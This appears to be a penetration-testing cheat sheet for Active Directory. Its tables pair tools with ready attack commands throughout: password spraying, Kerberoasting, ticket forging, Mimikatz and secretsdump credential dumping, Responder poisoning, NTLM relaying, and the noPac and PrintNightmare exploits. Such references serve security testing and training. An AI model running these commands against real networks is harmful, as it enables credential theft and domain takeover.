Tools

Note: Always verify tool source code to avoid security risks.


Enumeration & Situational Awareness Tools

| Tool | Description | Use Case | Platform |
|---|---|---|---|
| PowerView / SharpView | PowerShell/.NET tools for AD enumeration | Identify users, groups, permissions; find Kerberoasting or ASREPRoasting targets | Windows |
| BloodHound | Visualizes AD relationships | Map privilege escalation paths | Windows / Linux |
| SharpHound | C# data collector for BloodHound | Gather AD objects (users, groups, ACLs) | Windows |
| BloodHound.py | Python-based BloodHound data collector | Collect AD data from Linux hosts | Linux |
| ldapsearch | LDAP querying tool | Enumerate users, groups, computers | Linux |
| windapsearch | Simplifies LDAP queries | Targeted AD enumeration | Linux |
| adidnsdump | Dumps AD DNS records | Identify hosts and services | Any |
| Active Directory Explorer | GUI browser for AD database | Analyze object properties or offline snapshots | Windows |
| ADRecon | Generates Excel reports on AD | Highlight AD security weaknesses | Windows |


Attack & Exploitation Tools

Enumeration & Brute Forcing

| Tool | Description | Use Case | Example Command |
|---|---|---|---|
| Kerbrute | Go-based Kerberos enumeration | Discover valid usernames and weak passwords | `kerbrute userenum -d <domain> userlist.txt` |
| Impacket - GetNPUsers.py | ASREPRoasting tool | Extract AS-REP hashes for offline cracking | `GetNPUsers.py -dc-ip <IP> <domain>/ -usersfile users.txt` |
| CrackMapExec (CME) | SMB/WinRM/MSSQL enumeration | Password spraying, share enumeration | `cme smb <ip> -u <user> -p <pass>` |
| DomainPasswordSpray.ps1 | PowerShell password spraying | Test weak passwords, avoid lockouts | `Invoke-DomainPasswordSpray -PasswordList passwords.txt` |


Kerberos Attacks

| Tool | Description | Use Case | Example Command |
|---|---|---|---|
| Impacket - GetUserSPNs.py | SPN enumeration for Kerberoasting | Extract service tickets for offline cracking | `GetUserSPNs.py <domain>/<user>:<pass> -request` |
| Rubeus | Kerberos abuse toolkit | Kerberoasting, Pass-the-Ticket, Overpass-the-Hash | `Rubeus.exe kerberoast` |
| ticketer.py | Create custom TGT/TGS tickets | Golden Ticket / Silver Ticket creation | `ticketer.py -nthash <hash> -domain-sid <SID> -domain <domain>` |


Credential Harvesting & Post-Exploitation

| Tool | Description | Use Case | Example Command |
|---|---|---|---|
| Mimikatz | Extracts passwords, hashes, tickets | Credential dumping, Pass-the-Hash | `mimikatz.exe "sekurlsa::logonpasswords" exit` |
| secretsdump.py | Dumps LSA secrets & NTLM hashes | Offline hash extraction | `secretsdump.py <domain>/<user>:<pass>@<ip>` |
| evil-winrm | WinRM shell | Post-exploitation remote access | `evil-winrm -i <ip> -u <user> -p <pass>` |
| psexec.py / wmiexec.py | RCE via SMB/WMI | Lateral movement | `psexec.py <domain>/<user>:<pass>@<ip>` |


Relay & Spoofing Attacks

| Tool | Description | Use Case | Example Command |
|---|---|---|---|
| Responder | LLMNR/NBT-NS/mDNS poisoning | Capture NetNTLMv1/v2 hashes | `responder -I eth0` |
| Inveigh / InveighZero | PowerShell/.NET spoofing | Capture NetNTLM hashes | `Invoke-Inveigh -ConsoleOutput` |
| ntlmrelayx.py | NTLM relay attacks | Pivot & gain shells | `ntlmrelayx.py -t smb://<target>` |


Exploits & Vulnerability Tools

| Tool | Description | Use Case | Example Command |
|---|---|---|---|
| noPac.py | Exploits CVE-2021-42278/42287 | Privilege escalation to DA | `noPac.py <domain>/<user>:<pass>@<dc>` |
| PetitPotam.py | Forces NTLM auth via Print Spooler | Coerce authentication to relays | `PetitPotam.py <listener_IP> <target_IP>` |
| CVE-2021-1675.py | PrintNightmare exploit | RCE via Print Spooler | `CVE-2021-1675.py <domain>/<user>:<pass>@<ip>` |


Native Tools

| Tool | Description | Use Case | Example Command |
|---|---|---|---|
| setspn.exe | Manage SPNs | Find SPNs for Kerberoasting | `setspn -Q */*` |
| rpcdump.py | Enumerate RPC interfaces | Identify exposed services | `rpcdump.py <target>` |
| raiseChild.py | Abuse domain trusts | Cross-domain escalation | N/A |


SMB Enumeration & File Share Tools

| Tool | Description | Use Case | Example Command |
|---|---|---|---|
| smbmap | SMB share enumeration | Find accessible shares | `smbmap -H <target_IP> -u <user> -p <pass>` |
| Snaffler | Search for sensitive files | Locate credentials in shares | `snaffler -s <target_IP> -u <domain>\<user>` |
| smbserver.py | Create SMB server | File transfer between hosts | `smbserver.py SHARE /path/to/share` |


Security Auditing Tools

| Tool | Description | Use Case | Example Command |
|---|---|---|---|
| LAPSToolkit | Audit Microsoft LAPS | Exploit LAPS misconfigs | `Get-LAPSComputers` |
| PingCastle | AD health check | AD security assessment | `pingcastle --healthcheck` |
| Group3r | GPO enumeration | Find insecure GPOs | `group3r -d <domain>` |
| gpp-decrypt | Decrypt GPP passwords | Extract plaintext from GPP XML | `gpp-decrypt <encrypted_string>` |


RPC & Protocol Enumeration

| Tool | Description | Use Case | Example Command |
|---|---|---|---|
| rpcinfo | List RPC programs | Enumerate active RPC services | `rpcinfo -p <target_IP>` |
| rpcclient | AD RPC enumeration | List users, groups, shares | `rpcclient -U "<domain>\<user>%<pass>" <DC_IP>` |